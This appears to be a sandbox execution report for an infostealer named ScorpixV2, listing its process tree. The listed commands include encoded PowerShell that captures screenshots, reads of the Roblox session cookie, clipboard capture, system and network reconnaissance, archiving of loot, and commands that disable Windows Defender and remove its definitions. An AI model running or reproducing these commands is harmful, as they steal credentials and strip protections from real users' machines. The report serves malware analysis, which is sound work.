dABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:5492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
PID:6104 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sqlbbeh3\sqlbbeh3.cmdline"6⤵PID:5440
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1671.tmp" "c:\Users\Admin\AppData\Local\Temp\sqlbbeh3\CSCB7CE07ABD2C54D87A1FE4DC76A25097.TMP"7⤵PID:5660
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5860
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:6008
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5144
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:3460
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3688
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5616
-
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5528
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:3556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2772
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5208
-
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3936
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3948"4⤵PID:5524
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:796
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 39485⤵
- Kills process with taskkill
PID:5888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3028"4⤵PID:1264
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 30285⤵
- Kills process with taskkill
PID:5612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3468"4⤵PID:1424
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 34685⤵
- Kills process with taskkill
PID:4960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 800"4⤵PID:5692
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 8005⤵
- Kills process with taskkill
PID:5848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3948"4⤵PID:1536
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5320
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 39485⤵
- Kills process with taskkill
PID:5828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4020"4⤵PID:5564
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5676
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40205⤵
- Kills process with taskkill
PID:5224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3028"4⤵PID:5144
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 30285⤵
- Kills process with taskkill
PID:3688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3496"4⤵PID:1352
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5248
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 34965⤵
- Kills process with taskkill
PID:5512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3468"4⤵PID:5440
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 34685⤵
- Kills process with taskkill
PID:5384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1752"4⤵PID:5448
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5244
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17525⤵
- Kills process with taskkill
PID:5884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 800"4⤵PID:5256
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4032
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 8005⤵
- Kills process with taskkill
PID:5776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4000"4⤵PID:5252
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40005⤵
- Kills process with taskkill
PID:3844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:3480
-
C:\Windows\system32\getmac.exegetmac5⤵PID:6028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4020"4⤵PID:3152
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40205⤵
- Kills process with taskkill
PID:4564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2552"4⤵PID:396
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 25525⤵
- Kills process with taskkill
PID:5584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3496"4⤵PID:2456
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 34965⤵
- Kills process with taskkill
PID:5748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2180"4⤵PID:1264
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 21805⤵
- Kills process with taskkill
PID:5476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1752"4⤵PID:5964
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17525⤵
- Kills process with taskkill
PID:5424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4000"4⤵PID:5216
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4960
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40005⤵
- Kills process with taskkill
PID:4392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2552"4⤵PID:5444
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 25525⤵
- Kills process with taskkill
PID:5568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2180"4⤵PID:312
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 21805⤵
- Kills process with taskkill
PID:5920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:5504
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:5604
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\yJ5yN.zip" *"4⤵PID:2272
-
C:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\yJ5yN.zip" *5⤵
- Executes dropped EXE
PID:6080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:5148
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5820
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:2456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:5396
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3480
-
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:5456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:3352
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:6012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:3752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:5032
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6076
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:5652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:2388
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3804
-
-
-
-
-
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"2⤵
- Executes dropped EXE
PID:5408 -
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5808
-
-
-
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"2⤵
- Executes dropped EXE
PID:5952 -
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6080
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4660
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3744
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4796
-
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"1⤵
- Executes dropped EXE
PID:6024 -
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:4960 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'"3⤵PID:5688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:1776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵PID:2376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵PID:5736
-
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe5⤵
- Executes dropped EXE
PID:5724 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"6⤵PID:4916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"6⤵PID:208
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Detects videocard installed
PID:2032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"6⤵PID:536
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer7⤵PID:2040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"6⤵PID:3372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"6⤵PID:4248
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:3280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"6⤵PID:2420
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer7⤵PID:1632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵PID:5880
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵PID:5320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"6⤵PID:3556
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:5428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"6⤵PID:5840
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:2240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"6⤵PID:3348
-
C:\Windows\system32\cmd.execmd.exe /c chcp7⤵PID:5056
-
C:\Windows\system32\chcp.comchcp8⤵PID:3680
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"6⤵PID:1012
-
C:\Windows\system32\cmd.execmd.exe /c chcp7⤵PID:4972
-
C:\Windows\system32\chcp.comchcp8⤵PID:1768
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:1792
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:3708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"6⤵
- Clipboard Data
PID:4076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard7⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"6⤵
- Network Service Discovery
PID:5620 -
C:\Windows\system32\systeminfo.exesysteminfo7⤵
- Gathers system information
PID:1296
-
-
C:\Windows\system32\HOSTNAME.EXEhostname7⤵PID:5736
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername7⤵
- Collects information from the system
PID:5380
-
-
C:\Windows\system32\net.exenet user7⤵PID:3372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user8⤵PID:2544
-
-
-
C:\Windows\system32\query.exequery user7⤵PID:4204
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"8⤵PID:3608
-
-
-
C:\Windows\system32\net.exenet localgroup7⤵PID:1132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup8⤵PID:4988
-
-
-
C:\Windows\system32\net.exenet localgroup administrators7⤵PID:5972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators8⤵PID:5772
-
-
-
C:\Windows\system32\net.exenet user guest7⤵PID:2148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest8⤵PID:2264
-
-
-
C:\Windows\system32\net.exenet user administrator7⤵PID:5524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator8⤵PID:5924
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command7⤵PID:1228
-
-
C:\Windows\system32\tasklist.exetasklist /svc7⤵
- Enumerates processes with tasklist
PID:5824
-
-
C:\Windows\system32\ipconfig.exeipconfig /all7⤵
- Gathers network information
PID:2860
-
-
